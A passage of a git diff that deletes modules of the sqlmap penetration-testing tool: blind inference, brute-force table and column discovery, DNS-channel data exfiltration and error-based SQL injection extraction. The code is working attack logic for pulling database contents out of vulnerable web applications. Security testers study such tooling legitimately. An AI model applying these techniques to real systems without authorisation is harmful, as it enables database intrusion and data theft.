- threadData.shared.start = firstChar - - try: - def blindThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.index.acquire() - - if threadData.shared.index[0] - firstChar >= length: - kb.locks.index.release() - - return - - threadData.shared.index[0] += 1 - curidx = threadData.shared.index[0] - kb.locks.index.release() - - if kb.threadContinue: - charStart = time.time() - val = getChar(curidx) - if val is None: - val = INFERENCE_UNKNOWN_CHAR - else: - break - - with kb.locks.value: - threadData.shared.value[curidx - 1 - firstChar] = val - currentValue = list(threadData.shared.value) - - if kb.threadContinue: - if showEta: - progress.progress(time.time() - charStart, threadData.shared.index[0]) - elif conf.verbose >= 1: - startCharIndex = 0 - endCharIndex = 0 - - for i in xrange(length): - if currentValue[i] is not None: - endCharIndex = max(endCharIndex, i) - - output = '' - - if endCharIndex > conf.progressWidth: - startCharIndex = endCharIndex - conf.progressWidth - - count = threadData.shared.start - - for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] - - for i in xrange(length): - count += 1 if currentValue[i] is not None else 0 - - if startCharIndex > 0: - output = '..' + output[2:] - - if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): - output = output[:-2] + '..' 
- - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - _ = count - firstChar - output += '_' * (min(length, conf.progressWidth) - len(output)) - status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) - output += status if _ != length else " " * len(status) - - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) - - runThreads(numThreads, blindThread, startThreadMsg=False) - - except KeyboardInterrupt: - abortedFlag = True - - finally: - value = [_ for _ in partialValue] - value.extend(_ for _ in threadData.shared.value) - - infoMsg = None - - # If we have got one single character not correctly fetched it - # can mean that the connection to the target URL was lost - if None in value: - partialValue = "".join(value[:value.index(None)]) - - if partialValue: - infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue)) - else: - finalValue = "".join(value) - infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) - - if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): - dataToStdout(infoMsg) - - # No multi-threading (--threads = 1) - else: - index = firstChar - - while True: - index += 1 - charStart = time.time() - - # Common prediction feature (a.k.a. 
"good samaritan") - # NOTE: to be used only when multi-threading is not set for - # the moment - if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None: - val = None - commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl) - - # If there is one single output in common-outputs, check - # it via equal against the query output - if commonValue is not None: - # One-shot query containing equals commonValue - testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) - - query = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue))) - query = agent.suffixQuery(query) - - result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - # Did we have luck? - if result: - if showEta: - progress.progress(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): - dataToStdout(filterControlChars(commonValue[index - 1:])) - - finalValue = commonValue - break - - # If there is a common pattern starting with partialValue, - # check it via equal against the substring-query output - if commonPattern is not None: - # Substring-query containing equals commonPattern - subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) - testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) - - query = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue))) - query = agent.suffixQuery(query) - - result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) - - # Did we 
have luck? - if result: - val = commonPattern[index - 1:] - index += len(val) - 1 - - # Otherwise if there is no commonValue (single match from - # txt/common-outputs.txt) and no commonPattern - # (common pattern) use the returned common charset only - # to retrieve the query output - if not val and commonCharset: - val = getChar(index, commonCharset, False) - - # If we had no luck with commonValue and common charset, - # use the returned other charset - if not val: - val = getChar(index, otherCharset, otherCharset == asciiTbl) - else: - val = getChar(index, asciiTbl) - - if val is None: - finalValue = partialValue - break - - if kb.data.processChar: - val = kb.data.processChar(val) - - partialValue += val - - if showEta: - progress.progress(time.time() - charStart, index) - elif conf.verbose in (1, 2) or hasattr(conf, "api"): - dataToStdout(filterControlChars(val)) - - # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces - if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': - finalValue = partialValue[:-INFERENCE_BLANK_BREAK] - break - - if (lastChar > 0 and index >= lastChar): - finalValue = "" if length == 0 else partialValue - finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue - partialValue = None - break - - except KeyboardInterrupt: - abortedFlag = True - finally: - kb.prependFlag = False - kb.stickyLevel = None - retrievedLength = len(finalValue or "") - - if finalValue is not None: - finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue - hashDBWrite(expression, finalValue) - elif partialValue: - hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - - if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): - infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * 
retrievedLength) - dataToStdout(infoMsg) - else: - if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): - dataToStdout("\n") - - if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: - infoMsg = "retrieved: %s" % filterControlChars(finalValue) - logger.info(infoMsg) - - if kb.threadException: - raise SqlmapThreadException("something unexpected happened inside the threads") - - if abortedFlag: - raise KeyboardInterrupt - - _ = finalValue or partialValue - - return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ - -def queryOutputLength(expression, payload): - """ - Returns the query output length. - """ - - infoMsg = "retrieving the length of query output" - logger.info(infoMsg) - - start = time.time() - - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) - count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) - - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - if length == " ": - length = 0 - - return length diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py deleted file mode 100644 index 12e6a13d..00000000 --- a/lib/techniques/brute/use.py +++ /dev/null @@ -1,272 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import filterListValue -from lib.core.common import getFileItems -from 
lib.core.common import Backend -from lib.core.common import getPageWordSet -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import safeStringFormat -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE -from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE -from lib.core.settings import METADB_SUFFIX -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.request import inject - -def _addPageTextWords(): - wordsList = [] - - infoMsg = "adding words used on web page to the check list" - logger.info(infoMsg) - pageWords = getPageWordSet(kb.originalPage) - - for word in pageWords: - word = word.lower() - - if len(word) > 2 and not word[0].isdigit() and word not in wordsList: - wordsList.append(word) - - return wordsList - -def tableExists(tableFile, regex=None): - if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: - warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) - warnMsg += "for common table existence check" - logger.warn(warnMsg) - - message = "are you sure you want to continue? 
[y/N] " - test = readInput(message, default="N") - kb.tableExistsChoice = test[0] in ("y", "Y") - - if not kb.tableExistsChoice: - return None - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - if result: - errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) - - infoMsg = "checking table existence using items from '%s'" % tableFile - logger.info(infoMsg) - - tables.extend(_addPageTextWords()) - tables = filterListValue(tables, regex) - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(tables) - threadData.shared.value = [] - threadData.shared.unique = set() - - def tableExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s.%s" % (conf.db, table) - else: - fullTableName = table - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) - - kb.locks.io.acquire() - - if result and table.lower() not in threadData.shared.unique: - threadData.shared.value.append(table) - threadData.shared.unique.add(table.lower()) - - if conf.verbose in (1, 2) and not 
hasattr(conf, "api"): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, tableExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during table existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no table(s) found" - logger.warn(warnMsg) - else: - for item in threadData.shared.value: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [item] - else: - kb.data.cachedTables[conf.db].append(item) - - for _ in ((conf.db, item) for item in threadData.shared.value): - if _ not in kb.brute.tables: - kb.brute.tables.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) - - return kb.data.cachedTables - -def columnExists(columnFile, regex=None): - if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: - warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) - warnMsg += "for common column existence check" - logger.warn(warnMsg) - - message = "are you sure you want to continue? 
[y/N] " - test = readInput(message, default="N") - kb.columnExistsChoice = test[0] in ("y", "Y") - - if not kb.columnExistsChoice: - return None - - if not conf.tbl: - errMsg = "missing table parameter" - raise SqlmapMissingMandatoryOptionException(errMsg) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) - - if result: - errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - infoMsg = "checking column existence using items from '%s'" % columnFile - logger.info(infoMsg) - - columns = getFileItems(columnFile, unique=True) - columns.extend(_addPageTextWords()) - columns = filterListValue(columns, regex) - - table = safeSQLIdentificatorNaming(conf.tbl, True) - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) - - kb.threadContinue = True - kb.bruteMode = True - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(columns) - threadData.shared.value = [] - - def columnExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) - - kb.locks.io.acquire() - - if result: - threadData.shared.value.append(column) - - if conf.verbose in (1, 2) and not 
hasattr(conf, "api"): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, columnExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during column existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no column(s) found" - logger.warn(warnMsg) - else: - columns = {} - - for column in threadData.shared.value: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): - result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) - else: - result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) - - if result: - columns[column] = "numeric" - else: - columns[column] = "non-numeric" - - kb.data.cachedColumns[conf.db] = {conf.tbl: columns} - - for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): - if _ not in kb.brute.columns: - kb.brute.columns.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) - - return kb.data.cachedColumns diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/dns/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission 
-""" - -pass diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py deleted file mode 100644 index 6ef66482..00000000 --- a/lib/techniques/dns/test.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import randomInt -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.exception import SqlmapNotVulnerableException -from lib.techniques.dns.use import dnsUse - - -def dnsTest(payload): - logger.info("testing for data retrieval through DNS channel") - - randInt = randomInt() - kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt) - - if not kb.dnsTest: - errMsg = "data retrieval through DNS channel failed" - if not conf.forceDns: - conf.dnsName = None - errMsg += ". 
Turning off DNS exfiltration support" - logger.error(errMsg) - else: - raise SqlmapNotVulnerableException(errMsg) - else: - infoMsg = "data retrieval through DNS channel was successful" - logger.info(infoMsg) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py deleted file mode 100644 index 1e4216ef..00000000 --- a/lib/techniques/dns/use.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from lib.core.common import extractRegexResult -from lib.core.common import getSQLSnippet -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import safeStringFormat -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.settings import DNS_BOUNDARIES_ALPHABET -from lib.core.settings import MAX_DNS_LABEL -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request - - -def dnsUse(payload, expression): - """ - Retrieve the output of a SQL query taking advantage of the DNS - resolution mechanism by making request back to attacker's machine. 
- """ - - start = time.time() - - retVal = None - count = 0 - offset = 1 - - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): - output = hashDBRetrieve(expression, checkConf=True) - - if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: - output = None - - if output is None: - kb.dnsMode = True - - while True: - count += 1 - prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 - _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) - nulledCastedField = agent.nullAndCastField(fieldToCastStr) - extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) - if extendedField != fieldToCastStr: # e.g. MIN(surname) - nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) - fieldToCastStr = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) - nulledCastedField = agent.hexConvertField(nulledCastedField) - expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) - expressionUnescaped = unescaper.escape(expressionRequest) - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): - query = agent.prefixQuery("; %s" % expressionUnescaped) - query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) - forgedPayload = agent.payload(newValue=query) - else: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) - - Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) - - _ = conf.dnsServer.pop(prefix, suffix) - - if 
_: - _ = extractRegexResult("%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) - _ = decodeHexValue(_) - output = (output or "") + _ - offset += len(_) - - if len(_) < chunk_length: - break - else: - break - - output = decodeHexValue(output) if conf.hexConvert else output - - kb.dnsMode = False - - if output is not None: - retVal = output - - if kb.dnsTest is not None: - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) - - if count > 0: - hashDBWrite(expression, output) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - elif conf.dnsName: - warnMsg = "DNS data exfiltration method through SQL injection " - warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() - singleTimeWarnMessage(warnMsg) - - return safecharencode(retVal) if kb.safeCharEncode else retVal diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/error/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py deleted file mode 100644 index cb7fb7f0..00000000 --- a/lib/techniques/error/use.py +++ /dev/null @@ -1,442 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from 
lib.core.common import extractRegexResult -from lib.core.common import getPartRun -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import initTechnique -from lib.core.common import isListLike -from lib.core.common import isNumPosStrValue -from lib.core.common import listToStrValue -from lib.core.common import readInput -from lib.core.common import unArrayizeValue -from lib.core.convert import hexdecode -from lib.core.convert import htmlunescape -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTP_HEADER -from lib.core.exception import SqlmapDataException -from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MIN_ERROR_CHUNK_LENGTH -from lib.core.settings import MAX_ERROR_CHUNK_LENGTH -from lib.core.settings import NULL -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar - -def _oneShotErrorUse(expression, field=None, chunkTest=False): - offset = 1 - partialValue = None - threadData = getCurrentThreadData() - retVal = hashDBRetrieve(expression, checkConf=True) - - if retVal and PARTIAL_VALUE_MARKER in retVal: - partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") - logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) - offset += 
len(partialValue) - - threadData.resumed = retVal is not None and not partialValue - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: - debugMsg = "searching for error chunk length..." - logger.debug(debugMsg) - - current = MAX_ERROR_CHUNK_LENGTH - while current >= MIN_ERROR_CHUNK_LENGTH: - testChar = str(current % 10) - testQuery = "SELECT %s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) - result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) - - if (result or "").startswith(testChar): - if result == testChar * current: - kb.errorChunkLength = current - break - else: - result = re.search(r"\A\w+", result).group(0) - candidate = len(result) - len(kb.chars.stop) - current = candidate if candidate != current else current - 1 - else: - current = current / 2 - - if kb.errorChunkLength: - hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) - else: - kb.errorChunkLength = 0 - - if retVal is None or partialValue: - try: - while True: - check = r"%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = r"%s(?P[^<\n]*)" % (kb.chars.start) - - if field: - nulledCastedField = agent.nullAndCastField(field) - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: - extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) - if extendedField != field: # e.g. 
MIN(surname) - nulledCastedField = extendedField.replace(field, nulledCastedField) - field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) - - # Forge the error-based SQL injection request - vector = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - injExpression = expression.replace(field, nulledCastedField, 1) if field else expression - injExpression = unescaper.escape(injExpression) - injExpression = query.replace("[QUERY]", injExpression) - payload = agent.payload(newValue=injExpression) - - # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) - - incrementCounter(kb.technique) - - if page and conf.noEscape: - page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) - - # Parse the returned page to get the exact error-based - # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ - None) - - if output is not None: - output = getUnicode(output) - else: - trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == 
\ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) - - if trimmed: - if not chunkTest: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - - if not kb.testMode: - check = r"(?P[^<>\n]*?)%s" % kb.chars.stop[:2] - output = extractRegexResult(check, trimmed, re.IGNORECASE) - - if not output: - check = "(?P[^\s<>'\"]+)" - output = extractRegexResult(check, trimmed, re.IGNORECASE) - else: - output = output.rstrip() - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): - if offset == 1: - retVal = output - else: - retVal += output if output else '' - - if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: - offset += kb.errorChunkLength - else: - break - - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) - else: - retVal = output - break - except: - if retVal is not None: - hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) - raise - - retVal = decodeHexValue(retVal) if conf.hexConvert else retVal - - if isinstance(retVal, basestring): - retVal = htmlunescape(retVal).replace("
    ", "\n") - - retVal = _errorReplaceChars(retVal) - - if retVal is not None: - hashDBWrite(expression, retVal) - - else: - _ = "%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal - - return safecharencode(retVal) if kb.safeCharEncode else retVal - -def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): - values = [] - origExpr = None - - threadData = getCurrentThreadData() - - for field in expressionFieldsList: - output = None - - if field.startswith("ROWNUM "): - continue - - if isinstance(num, int): - origExpr = expression - expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) - - if "ROWNUM" in expressionFieldsList: - expressionReplaced = expression - else: - expressionReplaced = expression.replace(expressionFields, field, 1) - - output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) - - if not kb.threadContinue: - return None - - if not suppressOutput: - if kb.fileReadMode and output and output.strip(): - print - elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) - - if isinstance(num, int): - expression = origExpr - - 